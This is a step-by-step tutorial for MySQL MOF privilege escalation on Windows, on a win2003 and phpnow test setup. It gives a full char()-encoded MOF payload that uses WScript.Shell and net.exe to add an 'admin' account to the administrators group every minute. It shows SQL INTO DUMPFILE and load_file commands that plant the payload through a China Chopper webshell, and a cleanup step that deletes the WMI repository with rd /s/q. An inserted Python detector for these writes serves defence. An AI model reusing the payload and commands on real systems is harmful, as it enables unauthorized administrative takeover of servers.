MySQL MOF privilege escalation, part 3: learning MOF privilege escalation with MySQL
1. Test environment
win2003 + phpnow
2. Preconditions
MySQL with root privileges
3. Tools
(1) Tool 1: the MOF privilege-escalation script (the actual MOF script has been uploaded to a network drive)
(2) Tool 2: the Caidao (China Chopper) webshell client (file management + database management)
4. How the escalation works
Upload the MOF privilege-escalation script to the default MOF auto-load directory (path: c:/windows/system32/wbem/mof). The system picks up the MOF files in that directory and runs them at a fixed moment every minute; the script used in this experiment is triggered at the 5th second of every minute.
5. Implementation
5.1 Method 1: use Caidao's database-management feature to run the SQL export directly, writing the MOF as an ASCII (char()) file into the MOF directory
(reference: http://www.cnblogs.com/cnsanshao/p/5546872.html)
(1) Step 1: export the "MOF script" that adds a user (admin/admin)
select char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into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
(2) Step 2: export the "MOF script" that adds the regular user to the administrators group
select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,
114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
5.2 Method 2: low-privilege webshell upload + MySQL root export, to get the MOF into the MOF auto-load directory
(1) Step 1: with a low-privilege webshell already in hand, upload the "two privilege-escalation MOF scripts" to a directory the webshell can write to (assumed here to be c:/).
(Caidao's file-management feature is enough to upload the MOF scripts.)
(2) Step 2: since MySQL root can write files to any directory, export the uploaded MOF files into the MOF auto-load directory:
mysql> select load_file('c:/admin.mof') into dumpfile 'c:/windows/system32/wbem/mof/admin.mof';
Note: it is recommended to wait 2 minutes before exporting the "second MOF script", the one that adds the user to the group:
mysql> select load_file('c:/admins.mof') into dumpfile 'c:/windows/system32/wbem/mof/admins.mof';
5.3 Method 3: if root access to phpMyAdmin is available directly, run the SQL there to export the "ASCII-format MOF file";
for the export statements, see 5.1.
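As an added defender-side example (my code, not from the original post): the Python below scans MySQL general-log lines for INTO DUMPFILE writes that land in the wbem\mof auto-load directory (methods 1 and 2 above), decodes the char()-encoded body used in method 1, and reports the WQL filter and the consumer class declared in the dropped MOF. The sample MOF and log lines are constructed here, with a harmless placeholder script body.

```python
import re

# Constructed sample MOF (not the page's payload): same shape as nullevt.mof, harmless body.
SAMPLE_MOF = (
    'instance of __EventFilter as $EventFilter\r\n{\r\n'
    '    Query = "Select * From __InstanceModificationEvent "\r\n'
    '            "Where TargetInstance Isa \\"Win32_LocalTime\\" "\r\n'
    '            "And TargetInstance.Second = 5";\r\n};\r\n'
    'instance of ActiveScriptEventConsumer as $Consumer\r\n{\r\n'
    '    ScriptingEngine = "JScript";\r\n'
    '    ScriptText = "WScript.Echo(\\"placeholder\\")";\r\n};\r\n'
)
# Constructed general-log excerpt: benign query, method-1 char() write, method-2 copy, non-MOF dumpfile.
SAMPLE_LOG = "\n".join([
    "12 Query select name from users where id = 1",
    "12 Query select char(" + ",".join(str(ord(c)) for c in SAMPLE_MOF)
    + ") into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'",
    "12 Query select load_file('c:/admin.mof') into dumpfile 'C:\\Windows\\System32\\wbem\\mof\\admin.mof'",
    "13 Query select load_file('/etc/motd') into dumpfile '/tmp/motd.txt'",
])
DUMPFILE_RE = re.compile(r"into\s+dumpfile\s+'([^']+)'", re.I)
CHAR_RE = re.compile(r"\bchar\(([\d,\s]+)\)", re.I)
STRING_RE = r'"((?:[^"\\]|\\.)*)"'   # one MOF string literal, honouring \" escapes

def decode_char_payload(sql):
    """Rebuild the written file from SELECT char(n,n,...), or None if not char()-encoded."""
    m = CHAR_RE.search(sql)
    return "".join(chr(int(n)) for n in m.group(1).split(",")) if m else None

def summarize_mof(mof):
    """Extract the filter's WQL query (joining split string literals) and the consumer class."""
    q = re.search(r'Query\s*=\s*((?:%s\s*)+);' % STRING_RE, mof)
    consumer = re.search(r"instance of (\w*EventConsumer)", mof)
    return {"query": "".join(re.findall(STRING_RE, q.group(1))) if q else None,
            "consumer": consumer.group(1) if consumer else None}

def analyze_log(text):
    """Flag every INTO DUMPFILE whose target is the WMI MOF auto-load directory."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = DUMPFILE_RE.search(line)
        if not m or "/wbem/mof/" not in m.group(1).replace("\\", "/").lower():
            continue
        body = decode_char_payload(line)
        f = {"line": lineno, "target": m.group(1), "source": "char()" if body else "load_file()/other"}
        if body:
            f.update(summarize_mof(body))
        findings.append(f)
    return findings
```

On the response side, the same filter/consumer names recovered here identify the __FilterToConsumerBinding in root\subscription that has to be removed; setting secure_file_priv and not running MySQL as SYSTEM removes the precondition the page relies on.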
6. Cleanup after escalation
Once the MOF script has been loaded, it keeps adding the user at the 5th second of every minute. To stop this, proceed as follows:
Step 1: net stop winmgmt to stop the service
Step 2: delete the folder: rd /s/q C:\WINDOWS\system32\wbem\Repository
Step 3: net start winmgmt to start the service again